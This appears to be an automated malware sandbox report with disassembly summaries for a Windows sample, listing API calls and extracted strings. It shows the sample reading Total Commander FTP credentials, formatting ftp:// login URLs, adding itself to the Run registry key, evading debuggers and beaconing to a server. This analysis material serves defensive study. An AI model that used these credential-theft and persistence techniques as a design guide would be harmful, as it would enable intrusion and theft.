                          • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNEL32(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                          • String ID:
                          • API String ID: 1458499590-0
                          • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNELBASE(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 236 407e44-407e4c 230->236 233 407eba 231->233 234 407e7e-407e82 231->234 235 407ebc-407ebe 233->235 234->233 237 407e84 234->237 236->231 236->233 238 407e86-407e8f 237->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->235
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 296 4077d2-4077dc 294->296 297 4077bc-4077c8 GetLastError 294->297 298 4077ca call 40a786 295->298 296->286 300 4077de 296->300 297->298 301 4077cf 298->301 300->293 301->296
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 309 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 310 406d14-406d20 InternetAttemptConnect 311 406d22-406d25 310->311 312 406d26-406d41 InternetOpenW 310->312
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
